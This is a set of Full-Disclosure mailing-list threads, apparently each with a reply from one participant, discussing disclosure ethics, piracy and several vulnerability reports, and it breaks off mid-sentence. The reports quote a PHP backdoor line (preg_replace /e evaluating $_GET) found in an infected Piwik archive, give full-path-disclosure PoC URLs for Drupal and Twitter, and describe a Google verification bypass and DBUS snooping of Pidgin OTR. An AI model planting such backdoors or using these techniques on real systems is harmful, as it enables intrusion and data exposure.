Re: [Full-disclosure] Student expelled from Montreal college after finding vulnerability that compromised security of 250, 000
yeah, this is why most banks sucks: they won't let me try to break in, even if I have my money there and only doing it for making sure that it is secure. I promise I wouldn't touch anything else. On Tue, Jan 22, 2013 at 3:08 AM, Sanguinarious Rose sanguiner...@occultusterra.com wrote: And that is the reason why no one wants to report anything they find, it's because of people like you and your kind of thinking. Did they public post all the private information? No Did they try to use it for malious or illicit purposes? No Did they report it when they found it? Yes A horrible moral compass indeed! Arrest these people for being concerned and reporting it after stumbling upon security flaws! Amiright? On Mon, Jan 21, 2013 at 8:06 PM, Nick FitzGerald n...@virus-l.demon.co.uk wrote: Jeffrey Walton wrote: On Mon, Jan 21, 2013 at 5:42 PM, Philip Whitehouse phi...@whiuk.com wrote: Moreover, he ran it again after reporting it to see if it was still there. Essentially he's doing an unauthorised pen test having alerted them that he'd done one already. If his personal information is in the proprietary system, I believe he has every right to very the security of the system. BUT how can he verify (I assume that was the word you meant?) proper security of _his_ personal details? He would have to test using someone _else's_ access credentials. That is unauthorized access by most relevant legislation in most jurisdictions. Alternately, he could try accessing someone else's data from his login, and that is equally clearly unauthorized access. He and his colleague who originally discovered the flaw may have used each other's access credentials to access their own data, or used their own credentials to access the other's data _in agreement between themselves_ BUT in so doing most likely broke the terms of service of the system/their school/etc, _equally_ putting them afoul of most unauthorized access legislation. Is he allowed to opt-out of the system (probably not)? If not, he has a responsibility to check. BUT he has no resposibility to check on anyone _else's_ data and no _authority_ to use anyone else's credentials to check on his own. So, what responsibility does he really have? It sounds like he should have left well alone once he had reported this to the university and the vendors. That he did not have the sense or moral compass to recognize that tells us something important about him. Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Possible infection of Piwik 1.9.2 download archive
on a related note: the /e modifier will be deprecated with php 5.5 and hopefully removed in the following version https://wiki.php.net/rfc/remove_preg_replace_eval_modifier On Tue, Nov 27, 2012 at 1:23 PM, Max Grobecker m...@grobecker-wtal.dewrote: Yep, found later that the /e modifier allows you to execute code ;-) Am 27.11.2012 12:54, schrieb Christian Sciberras: At the moment I'm trying to figure out the further sense of this code, but it seems that there might also be some kind of backdoor (because of the use of $_GET). preg_replace(/(.+)/e, $_GET['g'], 'dwm'); You think? Chris. On Mon, Nov 26, 2012 at 9:17 PM, Maximilian Grobecker m...@grobecker-wtal.de mailto:m...@grobecker-wtal.de wrote: preg_replace(/(.+)/e, $_GET['g'], 'dwm'); ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] OT: OSX-PHP Dev Enviornment
I would strongly suggest trying out http://www.jetbrains.com/phpstorm/ On Wed, Aug 1, 2012 at 9:18 PM, Thor t...@hammerofgod.com wrote: Thanks - appreciated. t On Aug 1, 2012, at 12:06 PM, Ulisses Montenegro wrote: I'm not a big fan of IDEs for dynamically typed languages, but if I had to choose one I'd go with Komodo: http://www.activestate.com/komodo-ide/features It's multiplatform (don't know about how licenses work when using it across platforms), reasonably fast and offers lots of extra goodies aside from the editing/code browsing functionality. They offer a free (as in beer) version called Komodo Edit which lacks most of the best features of the commercial edition, but I guess you could check it to see if interface suits you. Ulisses On Wed, Aug 1, 2012 at 11:58 AM, Thor t...@hammerofgod.com wrote: Greets all. Sorry for the OT, but I thought I'd ask here... As you can guess, I've used Visual Studio to do web and application development for longer than I care to remember. Given that I've moved my production HoG facilities over to OSX, I now find myself missing the development environment VS afforded me as I migrate to PHP under Apache. I'm using EditRocket atm, but I'm soliciting recommendations for a PHP dev environment that will provide the same functions (or close) as VS does in regard to syntax checking, code completion, etc. I'm actually surprised at how quickly I've synched up with PHP, but I'd still like a more professional environment. Free or Commercial doesn't matter. I am thanking you. t ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “If debugging is the process of removing software bugs, then programming must be the process of putting them in.” - Edsger Dijkstra ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] About IBM
did you used the MustLive handle in your reports? maybe they have some kind of mail filtering in place... On Sun, May 27, 2012 at 10:51 PM, MustLive mustl...@websecurity.com.uawrote: Hello guys! I have a question for you about IBM. Does anybody has successfully contacted them, when they officially answered and fixed vulnerabilities in their software, since Leandro Meiners (since 2005)? When I've informed them many times in 2006-2008 concerning multiple vulnerabilities at multiple web sites of IBM and IBM ISS, they just ignored and not fixed or some of them first ignored and later hiddenly fixed. But it were their sites and I was hoping that concerning their software products they have different behavior. But when last week, during 16.05-20.05, I've sent five advisories to IBM concerning multiple vulnerabilities, which I have found (in May during pentest) in IBM Lotus Notes and Domino and IBM Lotus Notes Traveler, they just ignored. So they've demonstrated the same behavior, as concerning their web sites. And there are a lot of Cross-Site Scripting, Information Leakage, Brute Force, Insufficient Authentication, Cross-Site Request Forgery, Redirector and HTTP Response Splitting vulnerabilities in their software, which I've informed them about. Which can be used for full compromise of the server and the network of those, who use IBM's software (as it was done during my pentest). After the fourth e-mail to IBM security department, when there were still no answers from them, I've resent the fourth letter to their support (hoping that they would be more serious). The support answered on the next day very funny, not the same lame as Cisco answered me in 2008 concerning vulnerabilities at their sites (which I considered as most lamest vendor response, much more then those nominees on Pwnie Awards), but still not serious enough. The letter was standard one, that they are in receipt of my e-mail reporting and apologize for any inconvenience I may have experienced. When I've drew support's attention, that I've wrote already five letters to their security department (and just one sent to support) about multiple vulnerabilities in their software products and haven't received any answers from them, and I had no issues with working with their software (as he tried to state in his letter), then I've received another letter from other IBM employee, which wrote the same standard phrases and added that for informing about issues with software I can call them by phone :-). And already week after that there is still no answers from them (as it was predictable since 16.05). This is how IBM caring about security of their software, particularly Lotus Notes and Domino and Lotus Notes Traveler. Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google Accounts Security Vulnerability
is it me, or you aren't reading the mails that you are replying to? On Sat, May 19, 2012 at 7:28 PM, Thor (Hammer of God) t...@hammerofgod.comwrote: I tried, and it didn’t work (couldn’t repro). ** ** None of this matters – if you have username and password, you can check mail via POP3 or IMAP. Last time I checked, that was “by design.” If anyone is saying this is some sort of vulnerability because someone “happens across your username and password” then they are in the wrong business. ** ** Michael – for you to make these claims, get Google involved, and post their replies here but refuse to give them your username (which will be on every email you send out) so they can troubleshoot is really a waste of time. ** ** Your initial point of “even the big companies with teams of security experts have security vulnerabilities” seems to shrink a bit when they illustrate concern with the issue yet you refuse to provide the simplest of information. I not sure what other expectations one would have of an organization. ** ** *[image: Description: Description: Description: Description: Description: Description: Description: Description: Description: TimSig]*** * * *Timothy “Thor” Mullen* *www.hammerofgod.com* *Thor’s Microsoft Security Biblehttp://www.amazon.com/Thors-Microsoft-Security-Bible-Collection/dp/1597495727 * ** ** ** ** *From:* full-disclosure-boun...@lists.grok.org.uk [mailto: full-disclosure-boun...@lists.grok.org.uk] *On Behalf Of *Dan Kaminsky *Sent:* Friday, May 18, 2012 1:03 PM *To:* Michael Gray *Cc:* full-disclosure@lists.grok.org.uk *Subject:* Re: [Full-disclosure] Google Accounts Security Vulnerability*** * ** ** Surely you can create a sock puppet for debugging purposes. On Thu, May 17, 2012 at 11:43 AM, Michael Gray mg...@emitcode.com wrote: I'm not interested in providing that information. You can reproduce it without knowing my user name. On May 17, 2012 8:45 AM, Mike Hearn he...@google.com wrote: If you provide the name of the account you're logging in to, we can go take a look what's happening. On Thu, May 17, 2012 at 5:29 PM, Michael Gray mg...@emitcode.com wrote: Regardless of how you say it works, I can bypass it every time it would seem. Again, by using the method in my original post. It's likely you have a bug if this isn't the functionality you're after. I appreciate the statistics but they mean little to me. Thank you for taking the time to respond. I hope my suggestions and findings will assist you in correcting these issues On May 17, 2012 5:51 AM, Mike Hearn he...@google.com wrote: I understand your concerns, however they are not valid. You can be assured of the following: 1) We do not see this system as a replacement for passwords. If we block a login the user is notified and asked if it was them, if it wasn't we ask them to pick a new password. In very high confidence cases we will immediately force the user to choose a new password, because passwords are still the first line of defense. 2) We do not see this system as a replacement for 2-factor authentication. However the reality is that the vast majority of our users do not use 2-factor authentication and this is unlikely to change any time soon. 2SV imposes a significant extra burden on the user such that despite heavy promotion many users refuse to sign up, and of those that do, many choose to unenroll shortly afterwards. Therefore we also provide this always-on best effort system as well. 3) In fact it is very effective at stopping the large, botnet driven types of attacks we see on a daily basis and so saying it doesn't add any security is wrong. Since going live the system has successfully defended tens of millions of users who have a compromised password. A single unrepresentative data point based on one account isn't enough for you to judge the utility of the system, whereas we can clearly see the stopped campaigns (and drop in number of attempts). That said, if you have friends and relatives who use Google and you'd like to to make them more secure, by all means encourage them to set up two-factor authentication. -- Mike Hearn | Senior Software Engineer | he...@google.com | Account security team ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ** ** ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Ferenc Kovács @Tyr43l - http://tyrael.hu image001.png___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Re: [Full-disclosure] Google Accounts Security Vulnerability
From there, I attempted to log-in to my Google account with the same username and password. To my surprise, I was not presented with any questions to confirm my identity. I didn't verified, but from the report it seems that those additional steps of verification can be bypassed, if you first log in with the credentials via IMAP. I would guess that the successfull login on IMAP adds that new IP address to the trusted IP list, hence the web login will skip the additional verification. On Tue, May 15, 2012 at 7:57 PM, Thor (Hammer of God) t...@hammerofgod.comwrote: I'm not sure I understand the issue here - the requirement for someone happening to come across your username and password is a pretext. Logging on to the web interface where you can change password and other personal information as well as verify existing site cookies affords the service the ability to check these sorts of things. But you logged on via IMAP, which is its own service just like POP3 or SMTP. These services can't check where you are or for the existence of a cookie, so I'm not really sure what your expectation is, or why this is being presented as an issue. Am I missing something? Timothy Thor Mullen www.hammerofgod.com Thor's Microsoft Security Bible -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto: full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Jason Hellenthal Sent: Saturday, May 12, 2012 9:32 AM To: Michael J. Gray Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Google Accounts Security Vulnerability LMFAO! On Sat, May 12, 2012 at 04:22:30AM -0700, Michael J. Gray wrote: Effective since May 1, 2012. Products Affected: All Google account based services Upon attempting to log-in to my Google account while away from home, I was presented with a message that required me to confirm various details about my account in order to ensure I was a legitimate user and not just someone who came across my username and password. Unable to remember what my phone number from 2004 was, I looked for a way around it. The questions presented to me were: Complete the email address: a**g...@gmail.com Complete the phone number: (425) 4**-***7 Since this was presented to me, I was certain I had my username and password correct. From there, I simply went to check my email via IMAP at the new location. I was immediately granted access to my email inboxes with no trouble. From there, I attempted to log-in to my Google account with the same username and password. To my surprise, I was not presented with any questions to confirm my identity. This completes the steps required to bypass this account hijacking counter-measure. This just goes to show that even the largest corporations that employ teams of security experts, can also overlook very simple issues. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- - (2^(N-1)) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google Accounts Security Vulnerability
I don't know much about the verification mentioned here, but google/gmail has a 2-step verification, which solves the problem a little bit better imo. When you try to log in from a new computer you will be prompted for a code which is sent via sms to your phone. And that is the only place where you can log in with your google user+pass, every other application requires an application specific password, which can be only generated after you successfully log in into the web interface(with an exception: I remember that trying to add my google account to my android phone triggered an application specific password to be sent via sms).. So if the 2-step verification is turned on, you won't compromise your account instantly, the attacker has to have access either to your phone, or a device which is already on your trusted device list.. http://support.google.com/a/bin/answer.py?hl=enanswer=175197 On Tue, May 15, 2012 at 9:32 PM, Thor (Hammer of God) t...@hammerofgod.comwrote: Logging on to IMAP mail as one would be doing hundreds of times per day is not going to reset the web cookie. If that is what the OP is reporting, I would have to question if his recollection is correct since, by that logic, the password reset feature would never be activated since any other IMAP logon would clear it. ** ** If the user logged in, and was presented with the questions as stated, then it probably cleared any requirement since he would have to accept that. Unless he is saying that when presented with the questions he purposefully did not put them in and tried to logon to IMAP which I find odd. ** ** Regardless, if you already know the username and password for the email, it doesn’t matter anyway no does it? You could always get the mail via IMAP or POP or whatever options were configured in gmail. There wouldn’t be any need to go to the web interface in the first place. ** ** Now that I know I’m not missing anything, I’ll just let this one die on the vine. -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Fwd: Vulnerability research and exploit writing
Hi, Anybody else got this message? I think they are spamming the subscribers/regular participants of the list. -- Forwarded message -- From: steve ruskin ruskin.st...@gmail.com Date: Tue, Apr 24, 2012 at 9:56 AM Subject: Vulnerability research and exploit writing To: tyr...@gmail.com Hi , ** ** Trust all is well. I saw your experience in the field of vulnerability and exploit research and we have a scheme in our company to collaborate with researchers all over the world where we pay them on research done by them. Our interest is exploits which run over Windows 7, Snow Leopard with applications such MS Office, Adobe, Browsers, Media Player , Notepad etc along with native OS exploits as well as iphone, blackberry exploit. These exploits should be unpublished though the vulnerability may be public. We also have requirements to help us do ASLR and DEP bypass for exploits researched by us. ** ** Once you let us know about your skills and ideas we can provide you with our empanelment form via which you can register. We will look forward to your prompt response. ** ** Warm Regards, Steve Ruskin ** -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Earth to Facebook
https://www.facebook.com/whitehat/report/ ? On Thu, Mar 15, 2012 at 4:37 PM, J. Oquendo s...@infiltrated.net wrote: Earth calling Facebook security engineers, earth calling Facebook security engineers. Tried reaching out to you guys about a vulnerability a good friend discovered. No one should have to hunt you guys down in an effort to assist you with security flaws. -- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ J. Oquendo SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM It takes 20 years to build a reputation and five minutes to ruin it. If you think about that, you'll do things differently. - Warren Buffett 42B0 5A53 6505 6638 44BB 3943 2BF7 D83F 210A 95AFhttp://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x2BF7D83F210A95AF ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [iputils] Integer overflow in iputils ping/ping6 tools
technically he never stated that ping keeps the elevated privileges, just that the binary itself is setuid root, which is correct. On Wed, Mar 14, 2012 at 5:40 AM, Frankie Cutlass frankiecutlas...@gmail.com wrote: Incorrect. Ping is setuid root but it drops privs before reaching this code path. Even if you could exploit that for root (you cant) all you would end up with is a shell as your uid and a raw socket.. -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Drupal 7.x Search Module - Full Path Disclosure
On Wed, Mar 14, 2012 at 2:39 PM, Ursu Mihail mishka.u...@yahoo.com wrote: Drupal 7.x Search Module - Full Path Disclosure == Summary Full path disclosure due to insufficient input validation in the search module. == Description Performing a search with the keys parameter set as an array, an error message shows the full path of the Drupal installation, leading to possible further attacks. For the error messages to be displayed, php.ini's display_errors must be On. Authentication: Not Needed == Mitigation Correct input validation for the key parameters == Exploit PoC example.com/?q=searchkeys[]=securitate.md == Affected Versions Versions 7 7.12 are affected. Not tested on 6. == Credits Ursu Mihail [ http://securitate.md ] == Disclosure Timeline Reported to vendor on 1 Mar 2012. Response from vendor: Disclosure of the path is not considered a security risk. Drupal has a configuration setting which allows PHP warnings to be printed to the screen for debugging purposes... For production websites, it is a good idea to turn this off, and the messages will not be displayed. == Comments Unfortunately for them, many sites display errors in production. == ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ btw. thats a pretty common problem. I also reported a similar issue a while back about https://dev.twitter.com/search/apachesolr_search/api?page[]=123 it seems that the apachesolr_search drupal module also vulnerable. :/ http://code.google.com/p/twitter-api/issues/detail?id=2271 -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full disclosure is arrest of Sabu
2011/7/25 Laurelai Storm laure...@oneechan.org Oh and im not a part of lulzsec, FYI sabu tweeted 2 minutes ago wtf are you on about sir? maybe we could resurrect this thread. :) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Best DoS Tool
On Mon, Feb 27, 2012 at 4:35 AM, Manuel Moreno insecurech...@gmail.comwrote: Hi List!! I made some research about DoS Tools for my regulars PenTesting. What is considered the best tool for DoS? I made some test with scapy with god results. Wouldn't be the purpose of your research to answer that question? -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] pidgin OTR information leakage
On Mon, Feb 27, 2012 at 10:27 PM, Jeffrey Walton noloa...@gmail.com wrote: On Mon, Feb 27, 2012 at 3:21 PM, Rich Pieri rati...@mit.edu wrote: On Feb 27, 2012, at 2:37 PM, Michele Orru wrote: I think you didn't understood the content of the advisory. If there are 10 non-root users in an Ubuntu machine for example, if user 1 is using pidgin with OTR compiled with DBUS, then user 2 to 10 can see what user 1 pidgin conversation. This is not what the OP or CVE describe: plaintext. This makes it possible for attackers that have gained user-level access on a host, to listen in on private conversations associated with the victim account. Which I read as: if I compromise user1's account then I can snoop user1's DBUS sessions. It says nothing about me being able to snoop user2's sessions. The leading phrase about attackers gaining user-level access implies that legitimate users on a system are not a relevant issue. I tend to agree with you, and question if that is in fact true (it may well be, my apologies in advance). DBUS is on my list of things to probe, prod, and attatck due to data sharing. But I'd be really surprised if data was available across distinct user sessions. Unix/Linux are usually very good a separating processes and sessions so that data does not comingle. Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Exploitation Notes For the purpose of explaining the exploitation impact of this bug we will focus on a popular libpurple-based application, Pidgin. To snoop in on a Pidgin user’s conversation a remote attacker would need to connect to the DBUS daemon that is responsible for the user’s session. There are at least two ways to achieve this. The first one is to exploit an application that runs within the same desktop session as Pidgin. This application would have inherited the necessary DBUS_SESSION_BUS_ADDRESS environmental variable and will thus be able to connect to the DBUS daemon over a unix socket without a problem. The second way is to compromise the user’s account in some way and steal the DBUS_SESSION_BUS_ADDRESS value. There are multiple ways of acquiring the value for this variable, one of them being through /proc/pid/environ(which is accessible to processes of the same owner), and another being through a file in ~/.dbus/session-bus/. Using this value, the attacker will now be able to connect to DBUS with applications that are not part of the desktop session. Please note that the above methods do not require any control over the Pidgin process (ptrace or other). so you either need to able to dump the environment variable from a process run by the victim, or read files which AFAIK only the victim(and root ofc) has access to. did I miss anything? -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerability-lab.com XSS
On Fri, Feb 3, 2012 at 4:21 PM, Luis Santana hackt...@hacktalk.net wrote: Earlier today I tried to contact the people over at http://vulnerability-lab.com about an XSS vulnerability I found on their site (ironic) but it appears they want nothing to do with me. Praise Full-Disclosure. [image: Vulnerability-lab.com XSS - HackTalk Security]http://i.imgur.com/CripA.jpg http://i.imgur.com/CripA.jpg The Irony Of A Site For Disclosing Site Being Itself Vuln To Something So Trivial Basically I tried to report this issue to them through a private message on youtube and then a follow request on twitter (so I could DM them) but to no avail. Eventually rem0ve joined freenode and messaged me and told me he didn’t want to be cooperative with me or even be friendly. Sometimes being a prick just makes you look like an idiot. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Judging from the screenshot, it seems to be a reflected XSS through the User-Agent field. I would be curious how could this be exploited from the client side as you can't manipulate other visitors User-Agent header. Of course if the User-Agent is logged and the admin area which displays the logs has the same defect, then this is a different story. -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] when did piracy/theft become expression of freedom
On Sun, Jan 29, 2012 at 10:53 AM, Charles Morris cmor...@cs.odu.edu wrote: Dear Valdis and whoever else; The really ridiculous points are the following: A) Every time you execute/install/download a program you are committing evil data theft by not only copying secret or illegal information into RAM/Disk/Registers/Buffers/Busses/photons coming off the screen/human memory/history of the universe but potentially not just your physical property but on hundreds of routers and deduplication boxen around the earth. which is allowed to you by the copyright holders. B) You can't copyright or own a number, all digital representations are numbers, due to the boolean nature (no fuzzy data), etc. sadly one can: http://en.wikipedia.org/wiki/Illegal_prime C) Any data is a form of any other data given a specific transform, e.g. manifold / encryption key + algo, something as trivial as XOR and? D) You guys already know these points so why do we even care anymore about what these people say? Why even have these conversations. They will never stop. It's about greed and shortsightedness, not about what is moral or logical. Just try to ignore them or change the subject when the parrots start talking. you can't ignore them until the law is supporting them. And to preempt the flames from the blind, Yes I feel artists should be compensated for their contribution. agree -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] when did piracy/theft become expression of freedom
On Sat, Jan 28, 2012 at 11:26 PM, valdis.kletni...@vt.edu wrote: On Fri, 27 Jan 2012 19:02:09 PST, Zach C. said: If you buy an album used, the seller generally loses possession of it, you gain possession of it at a reduced cost, and the original purchase still gave the original seller and producer value. Note that if I shoplift a CD that sucks and isn't worth the $14.99 sticker price, I have deprived the producer of the ability to sell it to somebody else. That's the crucial point that underlies our social concept of theft - if I take it from you, you don't have it anymore. If I copy an album that isn't worth the sticker price, and which I would not have purchased at that price, two things of note happen: 1) As much as the labels wish it were so, they can't count that as lost revenue because it wouldn't have acccrued to them anyhow, any more than a car dealership can legitimately call it lost revenue if I walk onto their lot, tell the salescritter they're crazy if they think I'll pay $28K for a given car, and walk off the lot. (Now, if they want to count the Damn, we lost the $4.99 that guy *would* have paid if we charged that instead of $14.99, they're welcome to that. :) 2) More importantly, they still have the original bits and are free to look for other suckers who *will* pay $14.99. the shop can supplement the stolen CD for much less than 14.99, and also manufacturing a cd cost much less. the price not only contains the material value of the given product, but it is an arbitrary number, which was calculated based on the cost of the production(and marketing, and shipping, and etc.) costs of the product, and on the demand and pricing of that kind of product, so basically the market. the difference with the digital goods that there is no material part of the package, so it could seem that there is no theft and no loss of revenue. which could be true, if only those would pirate, who otherwise wouldn't/couldn't buy the product, which imo is not true. -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] when did piracy/theft become expression of freedom
Another thing to note, if artists, software companies etc were so nice to actually want to give all this stuff for free, I'm pretty sure no one is forcing them to sell their content. So don't talk about the they're not loosing anything bullshit to me. Then tell me what they lost. Can you prove that someone who downloaded a song would have spent money on the song if it had not been available for download? The argument that losses are incurred for every download has always been baseless and always will be. if you steal a bottle of milk, you can argue that it was right before the shop closing, and the warranty would have expired before they could sell it to somebody else, and demand them to prove it otherwise... Really though, what difference does it make if copyright industries are losing money? When last I checked, the stagecoach industry lost lots of money when the automobile was invented. Would you claim that people were stealing from stagecoach drivers by failing to support that industry and instead using their cars? Are you crying foul when people use digital cameras and incur losses for the film industry? Who was stealing from all those sheet music copyists and printers who lost their jobs because of the recording industry? Industries need to adapt to the times, or else they die. What makes recording, movie production, etc. so special? you forgot to link the original article, fixed it for you: http://torrentfreak.com/the-red-flag-act-of-1865-110626/ -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] dos attack on all 32bit php, asp etc services ?
On Sun, Jan 15, 2012 at 2:43 PM, Leutnant Steiner chk.mail...@gmail.comwrote: hi, just for a nice sunday afternoon video, if nota already known see: http://www.phpclasses.org/blog/post/171-PHP-Vulnerability-May-Halt-Millions-of-Servers.html did somone expericence the inpacts described for this vulunerability ? are you all on 64bit greetz you are a little bit late with that. http://nikic.github.com/2011/12/28/Supercolliding-a-PHP-array.html -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Rate Stratfor's Incident Response
On Sat, Jan 14, 2012 at 4:33 PM, Sanguinarious Rose sanguiner...@occultusterra.com wrote: I've been watching this chat for a while you didn't watched properly. nobody said that you shouldn't report vulnerabilities. we discussed whether would it help or not if one would hire the kiddies owning their sites. and we discussed why is it bad if you report the vulnerability and back it up with the proof that you compromised that said system. I always report the vulns that I stumble upon (from my own email and such) and while I'm doing this in good faith, I would never dare to actively exploit that vuln for better proof, because if they sue me, they would win. So I try to keep it that way, that I cannot be held responsible, because I didn't broke any law. I also think that for a full penetration testing, one shouldn't act without prior agreement with the owner and having that written down. To go back to the irl analogy: even if I'm doing it in good faith, so that I would report the owner or fix the lock myself, I shouldn't try to open every door and window on a random house, nor should I take a photo of his belongings that I can prove that I was there. -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Rate Stratfor's Incident Response
On Thu, Jan 12, 2012 at 10:46 PM, Benjamin Kreuter ben.kreu...@gmail.comwrote: On Thu, 12 Jan 2012 16:06:53 -0500 valdis.kletni...@vt.edu wrote: On Thu, 12 Jan 2012 15:16:19 EST, Benjamin Kreuter said: Really, calling it breaking in is a stretch. You connected a computer to a publicly accessible computer network, where anyone can send anything to your computer. If hacking such a system is breaking in, you might as well claim that shouting across your neighbor's yard is breaking in. Bad analogy. Closer would be if you have a house that's got a driveway on a public street, and you claim it's not breaking and entering if you walk up the driveway, try the doorknob, find it unlocked, and let yourself in without the permission of the residents. Saying that anybody could walk up and let themselves in the door doesn't make it legal. Would you say that we should arrest the person who walks into the house, takes a picture of themselves standing next to an expensive television and leaves the picture next to a note that says your door was unlocked? yeah, it would still be an offence in most country. Really though, it is still a terrible analogy. You can disconnect a computer from the Internet; you cannot disconnect a building from a street. A hacker in a foreign country might be attacking your computer system from that country, and could be outside the jurisdiction of any relevant law enforcement agency; a person who breaks into a building is committing a crime in whatever jurisdiction the building is in. the crime would still be a crime in the country where the building/computer is located, you just can't get the offender prosecuted, just like if he would flee the country after trespassing into your house. Analogies are nice and they help non-technical folks understand what is going on, but let's not get carried away with them. Someone who attacks a computer system over the Internet (or any other network) is sending unwanted/malicious messages. This is not the same as physically breaking into a building, locker, or computer. It may be illegal, but it is still very different from other crimes. why is it different? the only difference imo is that the whole IT/networking stuff is relatively new, and the law was lagging behind, and some people still that it is, when it isn't really anymore. you can get the same amount of fine/years in prison whether you stole the 